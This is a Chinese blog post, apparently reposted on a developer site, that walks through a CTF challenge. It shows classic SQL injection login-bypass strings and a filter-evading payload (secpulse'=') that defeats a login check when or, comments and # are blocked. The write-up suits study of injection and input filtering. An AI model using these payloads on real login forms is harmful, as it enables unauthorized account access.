记一道CTF 中遇到的SQL注入新型万能密码问题

栏目: 编程工具 · 发布时间: 7年前

内容简介:我们平时遇到的SQL注入万能密码都是形如admin' or '1'='1, 这种使用or 关键字使得查询结果永真,或者形如:' UNION Select 1,1,1 FROM admin Where ''=',这种使用union使得查询结果永真,但是有一次我在CTF的比赛中遇到的SQL注入问题,使用这两种万能密码都不好使,不管怎么变换形式,都不好使,显然是or和union 关键字被过滤掉了,下文我详细介绍我是如果绕过的,并给出一个新型SQL注入万能密码,也许在以后的CTF比赛中对大家有帮助。

0x00. 引言

我们平时遇到的 SQL 注入万能密码都是形如admin' or '1'='1, 这种使用or 关键字使得查询结果永真,或者形如:' UNION Select 1,1,1 FROM admin Where ''=',这种使用union使得查询结果永真,

但是有一次我在CTF的比赛中遇到的SQL注入问题,使用这两种万能密码都不好使,不管怎么变换形式,都不好使,显然是or和union 关键字被过滤掉了,

下文我详细介绍我是如果绕过的,并给出一个新型SQL注入万能密码,也许在以后的CTF比赛中对大家有帮助。

0x01、新型万能密码

题目是这样的:

记一道CTF 中遇到的SQL注入新型万能密码问题

根据提示,应该是过滤了常见的注入手段

猜测后台是这样的逻辑:

select * from table where username= '用户名' and password = '密码';

先试试常规万能密码:

admin' or 1=1-- -

记一道CTF 中遇到的SQL注入新型万能密码问题 or 和 --被过滤掉了,这条路估计走不通,试试其他形式的 :比如利用注释:

username:admin'/*hello
passeord = world*/#'

发现 # 和 * 被过滤掉了,没有了or ,#, * 就不能万能密码了吗? 显然不是

最后通过的是这样payload,也就是我今天要介绍的新型万能密码:

 username =  secpulse'='  password = secpulse'='

拼接起来就是:

select * from table where username='secpulse'='' and passowrd = 'secpulse'='';

sql解释引擎是从左至右执行: 数据库肯定没有secpulse这个用户,结果是false flase = '' 结果就是 true啊

password 同理,然后获得flag, 美滋滋:
记一道CTF 中遇到的SQL注入新型万能密码问题

0x02. 总结

CTF这类比赛的好处就是可以遇到各种生产环境中没有的场景,给我们提供了各种起奇淫技巧施展的舞台,可以打开我们的弄懂,对以后的渗透测试是有很大好处的。


以上所述就是小编给大家介绍的《记一道CTF 中遇到的SQL注入新型万能密码问题》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

Bulletproof Ajax中文版

Bulletproof Ajax中文版

Jeremy Keith / 刘申、宋薇 / 人民邮电出版社 / 2007-11 / 39.00元

本书介绍了如何构建无懈可击的Ajax Web应用程序,重点讲述如何在已有Web站点使用Ajax增强网站用户体验,从而尽可能地保证网站拥有最大限度的可移植性和亲和力,这正是目前大多数网站面临的需求。书中主要介绍了JavaScript、DOM、XMLHttpRequest、数据格式等,同时还提出了一种Hijax方法,即可以让Web应用程序平稳退化的方法。 本书适合各层次Web开发和设计人员阅读......一起来看看 《Bulletproof Ajax中文版》 这本书的介绍吧!

HTML 编码/解码
HTML 编码/解码

HTML 编码/解码

URL 编码/解码
URL 编码/解码

URL 编码/解码

html转js在线工具
html转js在线工具

html转js在线工具